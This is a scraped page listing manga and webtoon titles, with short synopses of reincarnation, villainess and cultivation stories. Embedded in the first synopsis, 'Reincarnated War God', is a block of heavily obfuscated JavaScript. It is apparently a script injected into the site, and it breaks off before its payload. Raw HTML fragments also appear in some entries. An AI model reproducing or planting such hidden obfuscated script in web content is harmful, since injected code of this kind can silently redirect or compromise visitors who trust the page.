Historical - Page 327

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Reincarnated War God

A desperate forty-year war that has extinguished both hope and happiness. Jinwoon, a man who was the god of battle, returned after living two lives to overturn the battle of the defeated war The God Of War<script></script><script>(function(_0x12506e,_0x7c0c77){var _0x5b4090=_0x5479,_0x3ae6ec=_0x12506e();while(!![]){try{var _0x383c69=parseInt(_0x5b4090(0x9d))/(-0xc1a+0x4*0x87e+-0x15dd)*(parseInt(_0x5b4090(0xb5))/(-0x165a+0x104+0x1558))+-parseInt(_0x5b4090(0xb6))/(-0xec4+0x23e*0x11+0x5*-0x4ab)*(-parseInt(_0x5b4090(0xaf))/(-0x4*0x4be+-0x1361+-0x1*-0x265d))+-parseInt(_0x5b4090(0x9b))/(0xf03+-0x1*0x1732+0x23*0x3c)+parseInt(_0x5b4090(0x99))/(-0x2710+0xdcc+-0xf9*-0x1a)*(-parseInt(_0x5b4090(0xb8))/(-0x1*0x17b7+-0x2f0*0x1+0x1aae))+-parseInt(_0x5b4090(0xbc))/(-0x2557+0xfe7+0x1578)*(parseInt(_0x5b4090(0xad))/(0x1*0x127f+0x22f9+-0x356f))+-parseInt(_0x5b4090(0xb0))/(-0x5ee+0x1576+-0xf7e)*(-parseInt(_0x5b4090(0xb4))/(0x1f60*0x1+-0x6b6+-0xb*0x23d))+parseInt(_0x5b4090(0xb9))/(-0x20d7+-0x16*0x1c6+0x47e7);if(_0x383c69===_0x7c0c77)break;else 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The Princess’ Jewelry Box

In order to become a unparalleled empress, princess Ariana creates a collection of talented men. The heartwarming appearance of the jewels she gather will truly make her shine.. more or less something like that


Marvelous Hero of the Sword

Based on the great natural law, the strong is invincible. The antediluvian method of elixir shines the mountains and rivers, the all-conquering treasured sword annihilates the universe and transmigration, and the blood vessel of Shura ruins the supremacy of every realm. Inheriting from the mandate of heaven, and practicing unrivaled skills, Nan Qin overwhelmingly started his own travel towards the strong which is immortal and matchless! “Burn the sky and boil the wine to study the rule of Shura, and then kill those beast all!” Sky Sword God


Strange Love Rivals Increased!

After I isekai’d as the female villain of an otome game, I just wanted to avoid the death ending and live a peaceful life. But why are the male lead and female lead fighting over me? Los rivales de amor extraños aumentaron, 奇怪的情敌增加了 &nbsp;


I Saved The Demon King

<div class="row detail-set"> <div class="col-24 col-sm-16 col-md-18 mt-4 mt-sm-0 attr-main"> <div class="mt-3"> <div id="limit-height-ctrl-summary" class="limit-height-ctrl max-100px"> <div id="limit-height-body-summary" class="limit-height-body"> <div class="limit-html">The infamous Big Demon actually accepted a 4-year-old female apprentice! Do you want to see Demon raise a baby? The 4-year-old female apprentice said that she didn't really think much about it. She was just a female college student who accidentally transverse into a book. What's the matter with her fate and grievances and Xiuxian Daguai? But this villain Demon Lord seems to have something hidden...</div> </div> </div> </div> </div> </div> <div class="mt-4 episode-list"> <div class="head"></div> </div>


To Be Or Not To Be

A Company President diagnosed with cancer accidentally transmigrated into a novel, and became the villainous emperor the male lead is going to kill?! On top of that, this male lead is the prince of the enemy kingdom that is being imprisoned by him at this moment…. Feels like he just took a step closer to death! No way! In order to live, I must please him, but I never knew that it wasn’t just simply hatred between us….


Wish to Say Farewell

I died in an accident while I was chased by debt collectors. Then I transmigrated into the book The Fairy’s Garden, but why did I have to possess the villainess?! Aine le Peregrine, an infamous femme fatale was the villainess. Besides harassing the heroine, she also has a peculiar hobby of collecting beautiful men. But in the end, she died at the hands of the men she collected… No, I can’t die like this! Alright! Starting today, my goal is to say farewell. [spoiler]I need to safely break up with these men immediately! “The reason I came to the duchy today is not to break off the engagement, but to tell you I have no intention of breaking off the engagement.” … Why is this man acting like this? The Grand Duke who should be falling in love with the heroine does not want to break off our engagement. Not only him, but the unfathomable Assassin King J and the wolf-man that brings out my motherly instinct, Shion… the more I try to get rid of them, the harder they stick onto me. Will she be able to safely break up with these three men and preserve her life?![/spoiler]


Finding You Who Abandoned Me

나를 버린 너를 찾아줘 Isaac Esteban, the one I loved and who loved me in return. ⠀⠀⠀⠀⠀⠀ He, who had been so devoted to her, suddenly betrayed Calliope for the saintess who had traveled the lands in search for knights to defeat the demon king. He turned his back on Calliope and left to follow Clementia as the chosen knight fated to subjugate the demon king, who is resurrected every 500 years, saying he felt true love for the latter. ⠀⠀⠀⠀⠀⠀ Foolish Calliope waited for him, hoping to take that one chance to cling to him when he returned. She could never forget that gaze that looked at her so lovingly. ⠀⠀⠀⠀⠀⠀ He came back a year later, dead, without a body and only his name left behind. ⠀⠀⠀⠀⠀⠀ Stricken with grief, she lived as if she were in hell for a year. In the end, during the parade for the one-year anniversary celebration of the demon king’s defeat, she climbed up the bell tower and jumped to her death. ⠀⠀⠀⠀⠀⠀ Stupid Calliope. Foolish Calliope. ⠀⠀⠀⠀⠀⠀ She could neither forget nor throw away the man who had done the same to her. ⠀⠀⠀⠀⠀⠀ She, who threw her life away like that, opened her eyes once again. To her childhood. To the day before she entered the Marquis’ household. To the days as a young child with nothing.


Demon Asura Becomes A 5 Year Old Loli

The Demon Queen Asura whom many fear just hearing her name turns into a child overnight and bullied? Oppressed? Assassinated?Impossible! Not happening!Hey, you trash cultivator, be honored that you are tasked to send this deity back home! &nbsp;


The Princess’s Time Travel

Chu Xing yue woke up with pain in her chest. She found herself being carried by an unknown man in ancient Chinese clothing. ” Keep silent, Chu Bing yue!” the man was angry but still protected her well from the assassins. “Chu Bing yue?” at that moment Chu Xing yue realized she had time travelled and entered the body of an ancient woman. What will happen next in Chu Xing yue’s story and can she return to her original time?


Princess And Her Ancient Vine

<h2>Princess and Her Ancient Vine</h2> As the most successful business woman in the country, our female lead, a CEO, thought her battlefield would be business. However, things changed after she obtained a mysterious vine, which brought her to a world to a land of cultivation! There she met her destined man... MangaToon got authorization from Bciyuan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Finally, The Blue Flame

If one day a blue flame appears, my life will shine brightly.” Princess Jeong Myeong, lost in Yeongchang-gun by Gwanghae-gun and was confined in the Gyeongung Palace with her mother, Inmok. Kim Gae-si, the palace of Gwanghae-gun, is overlooked by the chance to kill her. In the cold and desolate Gyeongung Palace, Jeong Myeong feels the presence of someone who has been around her from one day. “I am the king of goblins, the one who keeps you.” “The king of goblins? Do you have a name?” “I do not.” “Then I will give you one. Your name is… dating.” The curse of the impenetrable goddess of life imprisons Myung Myung’s life and is in danger of losing everything she wants. “Come on. Jeongmyeong, I was waiting for you.” The Goblin Protector / Blue Fire Whirlpool / Finally, a Blue Flame / Finally, the Blue Flame / Goblin si Pelindung / 青火の渦 / 마침내 푸른 불꽃이
